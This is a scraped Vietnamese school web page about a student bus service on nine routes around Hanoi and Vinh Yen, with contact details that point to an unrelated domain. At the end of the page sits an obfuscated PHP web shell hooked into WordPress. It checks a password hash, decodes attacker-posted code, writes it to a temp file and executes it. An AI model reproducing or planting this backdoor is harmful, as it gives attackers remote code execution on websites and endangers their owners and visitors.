Xe tuyến

Nhà trường cung cấp dịch vụ xe buýt đưa đón học sinh với hình thức đón trả tại điểm. Hệ thống xe buýt gồm các loại xe 7, 16, 29 chỗ tùy thuộc vào tuyến đường đón trả học sinh. Hệ thống xe buýt Nhà trường đang hoạt động trên 9 tuyến đường trải rộng khắp địa bàn TP Hà Nội, và Vĩnh Yên.

Dịch vụ xe buýt được giám sát bằng phần mềm quản lý trường học Little Lives, đồng thời Monitor sẽ gửi định vị cho phụ huynh lúc đón trả (cho biết thời gian và vị trí học sinh lên/ xuống xe buýt, hay việc xe có đi đúng lộ trình quy định hay không…).

Dịch vụ xe buýt là dịch vụ lựa chọn thêm và được sắp xếp căn cứ theo nguyện vọng của Phụ huynh và khả năng đáp ứng của Nhà trường. Eraschool thực hiện nghiêm túc các quy định vận hành dịch vụ cùng các biện pháp đảm bảo an toàn cho học sinh khi sử dụng dịch vụ xe buýt.

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@www.hi88.run

0899 889 818

www.hi88.run

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}
Baidu
map